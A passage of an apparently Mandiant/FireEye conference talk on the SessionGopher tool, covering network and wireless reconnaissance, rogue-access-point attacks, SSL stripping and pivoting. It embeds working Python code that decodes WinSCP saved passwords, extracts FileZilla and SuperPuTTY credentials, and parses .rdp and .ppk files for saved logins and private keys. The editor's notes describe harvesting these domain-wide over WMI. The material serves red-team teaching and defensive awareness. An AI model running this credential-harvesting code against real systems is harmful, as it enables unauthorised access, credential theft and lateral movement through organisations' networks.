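The reply carries no signature, no shared secret and nothing that only the real confluence.corp.com could know, which is why the defensive fix is to stop asking: the "Turn off multicast name resolution" policy (EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient) disables LLMNR on the client.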
  • 20. Crumb #2: IT HelpDesk/Intranet
    • Company helpdesk sites often lack authentication
    • Real examples from engagements:
      • "Our point of sale terminals can be accessed from Win7-Client1, Win7-Client2, and Win7-Client3"
      • Excel file storing Unix system passwords
  • 21. Crumb #2: IT HelpDesk/Intranet
    1. Nmap scan across subnets
    2. Run EyeWitness by Christopher Truncer
  • 22. Crumb #3: Anonymous Shares
    • Publicly available shared folders that do not require any form of authentication
    • Often out of perceived necessity (contractors, vendors)
    • Result: plaintext password files
  • 23. Crumb #4: When Hostnames Make Sense
    • Use PowerView or ADExplorer to get lists of hostnames
    • Nonintrusive way to understand the role of each system without doing Nmap scans
    • SQLWIN7.CORP.COM
    • MAIL01.CORP.COM
    • MEDIA-BKUP.CORP.COM
  • 24. WIRELESS BREADCRUMBS
  • 25. Crumb #1: Guest Network Host Visibility
    • Guest networks should be segregated. This is not always done properly.
    • Visible hosts with visible services can lead to lateral movement onto the corporate network
    • Pivot!
  • 26. Crumb #2: Remembered Networks
    • Your device probes for every access point it remembers having associated with
    • Yells out known SSID names indiscriminately
    • A WiFi Pineapple responds to any probe, so the device connects automatically
    • Forward the traffic to the internet while reading everything unencrypted
    • Quietly downgrade HTTPS requests to HTTP (SSL stripping; sites enforcing HSTS resist this)
  • 27. Remembered Networks: Real Mandiant Engagement (diagram)
  • 28. Remembered Networks: Real Mandiant Engagement (diagram)
  • 29. Remembered Networks: Real Mandiant Engagement (diagram): associated!
  • 30. Remembered Networks: Real Mandiant Engagement (diagram): associated! Visible to two different networks. PsExec, WMIExec, etc.
  • 31. (image only; no slide text)
  • 32. POST-EXPLOITATION. SessionGopher: Finding Unix Systems and Jump Boxes. https://github.com/fireeye/SessionGopher
  • 33. The Registry
    • On many engagements, consultants are tasked with exploiting Unix systems
      • Intellectual property on MacBook Pros
      • Point of sale terminals running Linux
      • Etc.
    • Often not domain-joined!
      • Would be so much easier if they were (use PowerView)
    • How can we find & exploit them?
  • 34. The Registry
    • Current methodology
      1. Nmap for live hosts not found in Active Directory (a. open Unix ports)
      2. netstat on domain-joined systems, look for active connections over Unix ports
      3. Search Active Directory for groups like "Linux Admins" & "Mac Admins" (a. find their members' workstations and active sessions)
    • Methodology relies on luck and active sessions. Better way?
  • 35. The Registry
    • HKEY_USERS
    • Persistent storage of saved sessions for any user who has logged in!
    • Users don't have to be currently logged in
      • Caveat: a profile's hive appears under HKEY_USERS\<SID> only while that profile is loaded; once unloaded, the same keys are still on disk in the profile's NTUSER.DAT and can be mounted with reg load
    • Though Unix systems are not domain-joined, they are often managed from domain-joined Windows systems
    • Valuable artifacts on these hosts
    • Solves our "active session" problem
    • But what can we find in this magical hive that helps us exploit Unix systems?
  • 36. The Registry (image only)
  • 37. Solution
    1. Find artifacts left by tools typically used to access Unix systems.
    2. If they exist, then saved sessions might exist. Extract 'em.
  • 38. Tools
    • WinSCP
    • FileZilla
    • PuTTY
    • SuperPuTTY
    • VNC
    • RDP
    • More!
  • 39. Paths to Sessions Stored in Registry
    • PuTTY: HKEY_USERS\<SID>\SOFTWARE\SimonTatham\PuTTY\Sessions
    • WinSCP: HKEY_USERS\<SID>\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
    • Microsoft Remote Desktop: HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers
    Non-registry (assumes filename/location unchanged)
    • FileZilla: <Drive>:\Users\<Username>\AppData\Roaming\FileZilla\sitemanager.xml
    • SuperPuTTY: <Drive>:\Users\<Username>\Documents\SuperPuTTY\Sessions.xml
  • 40. WinSCP
    • HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Sessions\<SessionName>
    • HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Configuration\Security
  • 41. (image only; no slide text)
  • 42. WinSCP (image only)
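The WinSCP deobfuscation that slides 40 to 42 and Editor's Notes 18 to 20 describe, as an added example that is not SessionGopher's own code. The scheme follows WinSCP's published source (EncryptPassword/DecryptPassword in core/Common.cpp): each byte is stored as two hex digits of (~byte) ^ 0xA3, and the plaintext behind a flag/dummy/length/shift header is UserName + HostName + password, which is why the session's own username and hostname act as the "key". SAMPLE_HIVE is a constructed stand-in for the two registry keys on slide 40 (hostnames and passwords made up); the encoder is included only so the decoder can be checked against fresh values.

```python
"""Decode the obfuscated Password value WinSCP stores for saved sessions.

Added example, not SessionGopher's own code. The scheme follows WinSCP's
published source (EncryptPassword/DecryptPassword in core/Common.cpp): every
byte is stored as two hex digits of (~byte) ^ 0xA3, and the plaintext behind
a flag/dummy/length/shift header is UserName + HostName + password. The
registry values in SAMPLE_HIVE are constructed; hosts and passwords are made up.
"""
import random

PW_MAGIC, PW_FLAG, PW_MAXLEN = 0xA3, 0xFF, 50
HEXDIGITS = "0123456789ABCDEF"


def _enc_byte(b: int) -> str:
    v = ((~b) & 0xFF) ^ PW_MAGIC
    return HEXDIGITS[v >> 4] + HEXDIGITS[v & 0x0F]


def _dec_byte(hexpair: str) -> int:
    return (~(int(hexpair, 16) ^ PW_MAGIC)) & 0xFF


def winscp_decrypt(hostname: str, username: str, value: str):
    """Return the saved password, or None if `value` was not produced for this user@host."""
    key = (username + hostname).encode("utf-8")
    pairs = [value[i:i + 2] for i in range(0, len(value) - 1, 2)]

    def next_byte() -> int:
        return _dec_byte(pairs.pop(0)) if pairs else 0

    flag = next_byte()
    if flag == PW_FLAG:
        next_byte()                 # dummy byte
        length = next_byte()
    else:
        length = flag               # legacy layout: first byte is the length
    shift = next_byte()
    del pairs[:shift]               # skip the random prefix of `shift` bytes
    data = bytes(next_byte() for _ in range(length))
    if flag == PW_FLAG:
        if not data.startswith(key):
            return None             # wrong key: WinSCP itself would treat this as an empty password
        data = data[len(key):]
    return data.decode("utf-8", "replace")


def winscp_encrypt(hostname: str, username: str, password: str, rnd=random.randrange) -> str:
    """The forward direction, so the decoder can be checked against freshly made values."""
    data = (username + hostname + password).encode("utf-8")
    shift = rnd(PW_MAXLEN - len(data)) if len(data) < PW_MAXLEN else 0
    out = _enc_byte(PW_FLAG) + _enc_byte(0x00) + _enc_byte(len(data) & 0xFF) + _enc_byte(shift)
    out += "".join(_enc_byte(rnd(256)) for _ in range(shift))
    out += "".join(_enc_byte(b) for b in data)
    while len(out) < PW_MAXLEN * 2:  # pad with noise to a fixed minimum size
        out += _enc_byte(rnd(256))
    return out


# Constructed stand-in for the two keys slide 40 names, relative to
# HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\. The Password value equals
# winscp_encrypt("db", "root", "s3cret") with a zero shift and zero-byte padding,
# i.e. exactly what WinSCP would write apart from the random noise.
SAMPLE_HIVE = {
    "Configuration\\Security": {"UseMasterPassword": 0},
    "Sessions\\root@db": {
        "HostName": "db",
        "UserName": "root",
        "Password": "A35C505C2E333328383E2F6F3F2E3928" + "5C" * 34,
    },
    "Sessions\\anon@files": {"HostName": "files", "UserName": "anonymous"},  # no saved password
}


def harvest_winscp(hive: dict):
    """Walk a WinSCP 2 subtree (as a dict) and return (session, user, host, password) rows."""
    if hive.get("Configuration\\Security", {}).get("UseMasterPassword") == 1:
        return []  # then passwords are encrypted under the master password; only offline cracking remains
    rows = []
    for path, values in hive.items():
        if path.startswith("Sessions\\") and "Password" in values:
            password = winscp_decrypt(values["HostName"], values["UserName"], values["Password"])
            rows.append((path.split("\\", 1)[1], values["UserName"], values["HostName"], password))
    return rows


if __name__ == "__main__":
    for row in harvest_winscp(SAMPLE_HIVE):
        print(row)
```

Checking Configuration\Security\UseMasterPassword first is the practitioner's step: when it is 1 the value is real encryption rather than obfuscation, and a decoder that ignores the flag silently returns garbage instead of reporting that a master password is in use.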
  • 43. Paths to Sessions
    • HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Default
  • 44. FileZilla: <Drive>:\Users\<Username>\AppData\Roaming\FileZilla\sitemanager.xml
  • 45. SuperPuTTY: <Drive>:\Users\<Username>\Documents\SuperPuTTY\Sessions.xml
    • ExtraArgs field can contain a plaintext password
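The two non-registry artifacts from slides 44 and 45 (and Editor's Notes 22 and 23) parsed in working code, as an added example that is not SessionGopher's own code. Both XML documents are constructed to the layouts those notes describe: FileZilla keeps the password in <Pass encoding="base64"> (older builds wrote it as plain text), SuperPuTTY keeps it inside the ExtraArgs attribute after -pw, where it is passed straight through to putty.exe. Hosts, users and passwords are made up.

```python
"""Recover saved logins from FileZilla's sitemanager.xml and SuperPuTTY's Sessions.xml.

Added example, not SessionGopher's own code. Both documents below are
constructed: FileZilla keeps the password in <Pass encoding="base64">
(older builds wrote it plain), SuperPuTTY keeps it in the ExtraArgs
attribute after -pw. Hosts, users and passwords are made up.
"""
import base64
import re
import xml.etree.ElementTree as ET

SAMPLE_FILEZILLA = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.25.1" platform="windows">
  <Servers>
    <Server>
      <Host>ftp.corp.example</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>svc_upload</User>
      <Pass encoding="base64">U3VtbWVyMjAxNyE=</Pass>
      <Logontype>1</Logontype>
      <Name>POS image server</Name>
    </Server>
    <Server>
      <Host>backup01.corp.example</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>root</User>
      <Pass>legacyplain</Pass>
      <Logontype>1</Logontype>
      <Name>media backup</Name>
    </Server>
  </Servers>
</FileZilla3>
"""

SAMPLE_SUPERPUTTY = """<?xml version="1.0" encoding="utf-8"?>
<ArrayOfSessionData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SessionData SessionId="Linux/web01" SessionName="web01" ImageKey="computer" Host="web01.corp.example" Port="22" Proto="SSH" PuttySession="Default Settings" Username="deploy" ExtraArgs="-pw hunter2 -X" />
  <SessionData SessionId="Linux/db02" SessionName="db02" ImageKey="computer" Host="db02.corp.example" Port="22" Proto="SSH" PuttySession="Default Settings" Username="dba" ExtraArgs="-pw &quot;sp ace&quot;" />
  <SessionData SessionId="Linux/jump" SessionName="jump" ImageKey="computer" Host="jump01.corp.example" Port="2222" Proto="SSH" PuttySession="Default Settings" Username="bob" ExtraArgs="-i C:\\keys\\bob.ppk" />
</ArrayOfSessionData>
"""

FILEZILLA_PROTOCOLS = {"0": "ftp", "1": "sftp"}  # the two the slides care about; others stay numeric


def _xml_root(doc):
    return ET.fromstring(doc.encode("utf-8") if isinstance(doc, str) else doc)


def filezilla_sessions(doc):
    """Return one dict per <Server> in sitemanager.xml, with the password decoded."""
    sessions = []
    for server in _xml_root(doc).iter("Server"):
        def field(tag):
            node = server.find(tag)
            return (node.text or "") if node is not None else ""
        pass_node = server.find("Pass")
        password = ""
        if pass_node is not None and pass_node.text:
            if pass_node.get("encoding") == "base64":
                password = base64.b64decode(pass_node.text).decode("utf-8", "replace")
            else:
                password = pass_node.text  # older FileZilla: stored as-is
        sessions.append({
            "name": field("Name"), "host": field("Host"), "port": int(field("Port") or 0),
            "protocol": FILEZILLA_PROTOCOLS.get(field("Protocol"), field("Protocol")),
            "user": field("User"), "password": password,
        })
    return sessions


# -pw followed by either a double-quoted value or a bare token
PW_ARG = re.compile(r'(?:^|\s)-pw\s+(?:"([^"]*)"|(\S+))')


def superputty_sessions(doc):
    """Return one dict per <SessionData>, pulling the password out of ExtraArgs if -pw is present."""
    sessions = []
    for node in _xml_root(doc).iter("SessionData"):
        extra = node.get("ExtraArgs") or ""
        match = PW_ARG.search(extra)
        password = None
        if match:
            password = match.group(1) if match.group(1) is not None else match.group(2)
        sessions.append({
            "name": node.get("SessionName"), "host": node.get("Host"), "port": int(node.get("Port") or 0),
            "proto": node.get("Proto"), "user": node.get("Username"),
            "password": password, "extra_args": extra,
        })
    return sessions


if __name__ == "__main__":
    for s in filezilla_sessions(SAMPLE_FILEZILLA) + superputty_sessions(SAMPLE_SUPERPUTTY):
        print(s)
```

A SuperPuTTY session without -pw is still worth keeping: an -i argument names the .ppk file the user logs in with, and that file is the next artifact on the list.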
  • 46. PuTTY .ppk Files
    • One-click PuTTY logins
    • Key can be plaintext (as in the screenshot) or encrypted
  • 47. Microsoft .rdp Files
    • Double-clicking one launches mstsc.exe with its saved settings, but the file itself is plain text and can be read by dragging it into a text editor
    • Plethora of arguments, many optional
    • Host, whether to connect to the admin session, whether to prompt for credentials, etc.
    • Fieldname:TypeOfField:Value
    • TypeOfField = i (integer) or s (string), e.g. full address:s:host and prompt for credentials:i:1
  • 48. (image only; no slide text)
  • 49. (image only; no slide text)
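The two file formats from slides 46 and 47 (and Editor's Notes 24 and 25) parsed in working code, as an added example that is not SessionGopher's own code. Both inputs are constructed: the .rdp hostnames are made up and the base64 bodies in the .ppk samples are placeholder text rather than real key material (the parser does not validate them). Beyond the i and s types the slide names, .rdp files also use b for hex-encoded binary, which is how a saved password appears (as a DPAPI blob in the "password 51" field).

```python
"""Parse Microsoft .rdp and PuTTY .ppk files for the fields that matter in post-exploitation.

Added example, not SessionGopher's own code. Both inputs are constructed: the
.rdp hostnames are made up, and the base64 bodies in the .ppk samples are
placeholder text rather than real key material. The .rdp layout is one
"name:type:value" per line with type i (integer), s (string) or b (binary as
hex); the .ppk layout is "Header: value" lines with the key body after the
Public-Lines/Private-Lines counts.
"""

SAMPLE_RDP = """screen mode id:i:2
full address:s:jump01.corp.example:3390
username:s:bob
domain:s:CORP
administrative session:i:1
prompt for credentials:i:0
gatewayhostname:s:rdgw.corp.example
password 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB
"""
# (the "password 51" value above is a truncated placeholder: a DPAPI blob header and nothing more)

SAMPLE_PPK_PLAIN = """PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20170501
Public-Lines: 2
AAAAB3NzaC1yc2EAAAABJQAAAIEAplaceholderPUBLICkeyMATERIALnotREAL
AAAAB3NzaC1yc2EAAAABJQAAAIEAplaceholderPUBLICkeyMATERIALnotREAL
Private-Lines: 2
AAAAgHplaceholderPRIVATEkeyMATERIALnotREALplaceholderPRIVATEkey
AAAAgHplaceholderPRIVATEkeyMATERIALnotREALplaceholderPRIVATEkey
Private-MAC: 0123456789abcdef0123456789abcdef01234567
"""

SAMPLE_PPK_ENCRYPTED = SAMPLE_PPK_PLAIN.replace("Encryption: none", "Encryption: aes256-cbc")


def parse_rdp(text: str) -> dict:
    """Return the connection-relevant settings from a .rdp file, plus every raw field."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if line.count(":") < 2:
            continue
        name, kind, value = line.split(":", 2)
        if kind == "i":
            try:
                value = int(value)
            except ValueError:
                pass
        fields[name] = value
    address = str(fields.get("full address", ""))
    host, port = address, 3389
    if address.count(":") == 1 and address.rsplit(":", 1)[1].isdigit():  # host:port
        host, port = address.rsplit(":", 1)[0], int(address.rsplit(":", 1)[1])
    return {
        "host": host,
        "port": port,
        "user": str(fields.get("username", "")),
        "domain": str(fields.get("domain", "")),
        "gateway": str(fields.get("gatewayhostname", "")),
        "admin_session": fields.get("administrative session") == 1,        # the /admin console session
        "prompts_for_credentials": fields.get("prompt for credentials"),   # 0 = uses a saved credential
        "saved_password": "password 51" in fields,  # DPAPI blob: decryptable only as the user who saved it
        "fields": fields,
    }


def parse_ppk(text: str) -> dict:
    """Return the headers of a .ppk file plus whether the private half is encrypted (slide 46)."""
    lines = text.splitlines()
    info, i = {}, 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key.startswith("PuTTY-User-Key-File-"):
            info["format_version"] = int(key.rsplit("-", 1)[1])
            info["key_type"] = value
        elif key in ("Public-Lines", "Private-Lines"):
            count = int(value)
            info[key.split("-")[0].lower() + "_blob"] = "".join(lines[i:i + count])
            i += count
        else:
            info[key.lower().replace("-", "_")] = value
    # "none" means the private key is usable as-is; anything else needs the passphrase
    info["encrypted"] = info.get("encryption", "none") != "none"
    return info


if __name__ == "__main__":
    print(parse_rdp(SAMPLE_RDP))
    for sample in (SAMPLE_PPK_PLAIN, SAMPLE_PPK_ENCRYPTED):
        print({k: v for k, v in parse_ppk(sample).items() if not k.endswith("_blob")})
```

The saved_password flag is the caveat a practitioner wants: a "password 51" value is protected with the saving user's DPAPI key, so it is only usable from that user's context on that machine, unlike the SuperPuTTY and FileZilla values, which are readable by anyone who has the file.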
  • 50. Windows Management Instrumentation (WMI)
    • Rather than running SessionGopher on each computer (impractical), we can use WMI
    • Built-in Invoke-WmiMethod cmdlet in PowerShell
    • Remote registry querying ability (the StdRegProv class)
  • 51. (image only; no slide text)
  • 52. Write to CSV (Invoke-SessionGopher -o)
    • Create a physical mapping of the network
    • Aggregate all session data across the entire domain or targeted computers
    • Essentially, see the physical infrastructure of the network!
  • 53. QUESTIONS? Twitter: @arvanaghi. GitHub: https://github.com/fireeye/SessionGopher. Brandon Arvanaghi

Editor's Notes

  1. SessionGopher: https://github.com/fireeye/SessionGopher
  2. https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-records The receiving mail server automatically checks the SPF record for the domain, if one exists.
  3. Social engineering opportunities arise from seeing third-party relationships all from a DNS record!
  4. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
  5. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
  6. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries. Primary target for attacking a large organization: small, lesser-known subsidiaries.
  7. Command-line syntax:
     HELO <domain> -> prepares the SMTP server for use
     MAIL FROM:<email address> -> mail sender
     RCPT TO:<email address> -> mail recipient
     DATA -> message headers (From, To, Subject) and content
     Image source: http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
  8. Source: http://www.myintranetdashboard.com/graphics/screen2b.gif
  9. EyeWitness by Christopher Truncer: https://github.com/ChrisTruncer/EyeWitness EyeWitness automatically screenshots all HTTP/HTTPS ports discovered by Nmap for you, and makes an attempt at classifying the kind of site each is. When EyeWitness recognizes a login page, it provides the default credentials typically used for that service. Photo taken from https://www.christophertruncer.com/eyewitness-triage-tool/
  10. Wired-in network on the left with Ethernet. These hosts should, in theory, not be visible to any system not physically connected to their network. Security guards at the door, physical access controls, monitoring all wall ports, etc.
  11. On one of our engagements, we saw the physically-connected computers were still probing for remembered SSIDs because they had their WiFi turned on. Most people do not turn off their WiFi even when they are wired in, which can make them visible to the outside world!
  12. We spoofed the "gogoinflight" SSID and established an association between our TP-Link access point and the system. Now we could see the system on our own spoofed subnet, see what services it was running, and run tools against it.
  13. By running Responder or a social engineering campaign, we could use PsExec or WMIExec to exploit that system from our new subnet. Once we’ve gained access to that system, we could pivot to the wired internal network, since it is dual-homed! Essentially, we get access to the same wired-in benefits as any system physically connected. Despite this company not having any remote portal access or VPN, this physical security measure failed due to keeping WiFi enabled.
  14. System Preferences > Network > Advanced. It used to be that a more "preferred" association would make you drop your current one! E.g. if you were connected to CompanyWiFi but had gogoinflight as a more preferred network and a gogoinflight SSID appeared, your system would automatically switch!
  15. https://github.com/fireeye/SessionGopher
  16. SID structure: S-1-5-21-<domain identifier>-<RID>. Query all of these for domain users who have logged on! The Registry has both volatile and static data. As an example, HKEY_LOCAL_MACHINE\HARDWARE fills its subkeys at boot time after analyzing the hardware under the Windows system. HKEY_USERS holds the per-user hives (persistent data about domain users who have logged onto the system) while those hives are loaded. HKEY_CURRENT_USER is actually a symlink to the HKEY_USERS subkey of the currently logged-in user!
  17. Persistent artifacts from all these tools can help get a network mapping not just for Unix systems, but also jump boxes. Jump boxes can be difficult to find, but when extracting all saved RDP sessions from each host, you can see to where these servers RDP. Once you find a saved RDP session with a hostname you know to be a segmented environment, you know which server can communicate with that host!
  18. The saved password string above for WinSCP sessions is not encrypted by default. That is obfuscation, and it is easily reversible. The "key" is the session's username and hostname (WinSCP concatenates UserName + HostName in front of the password). The password is only encrypted when the UseMasterPassword value in the second registry subkey (Configuration\Security) is set to 1. If it is set, you can only extract the encrypted password and attempt to brute-force it.
  19. As seen here, WinSCP's password obfuscation algorithm uses a sequence of bitwise operations XOR'd with a magic value. The password obfuscation algorithm has been reverse engineered across several languages, but never before in PowerShell.
  20. SessionGopher’s built-in WinSCP deobfuscator
  21. HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Default contains most recent RDP attempts
  22. FileZilla stores its password in an XML file, not in the registry. By default, the saved password is only base-64 encoded, and not encrypted.
  23. SuperPuTTY is used to manage simultaneous PuTTY sessions, and has the added benefit of storing passwords for one-click SSH sessions. PuTTY does not store passwords, so many clients use SuperPuTTY as a wrapper. SuperPuTTY sessions are saved in a Sessions.xml file, not in the registry. The password is placed in the "ExtraArgs" attribute, which can contain a multitude of additional arguments. SuperPuTTY interprets anything following "-pw" as the password argument for the SSH session.
  24. Stored sessions as .rdp files can be used for one-click logins. These files are executable and can also be dragged into a text editor like Sublime Text and read.
  25. SessionGopher synthesizes the .ppk and .rdp files and makes sense of them. It returns the private key, the Private-MAC, and whether or not the key is encrypted.
  26. . .\SessionGopher.ps1 Invoke-SessionGopher -Thorough
  27. Invoke-WmiMethod allows you to use WMI to read the remote registry of a different system using the –Class ‘StdRegProv’. From your own attack computer connected to the network, you can read the persistent registry artifacts of HKEY_USERS for each box using WMI. Quiet, quick, and effective!
  28. Invoke-SessionGopher –iL inputlist.txt Invoke-SessionGopher –AllDomain Invoke-SessionGopher –Target winbox.company.com After running SessionGopher across a domain or set of computers, you will essentially have a network mapping of the entire corporate infrastructure! Jump boxes, Unix systems, and other non-domain hosts should all be revealed to you along with the path to get there.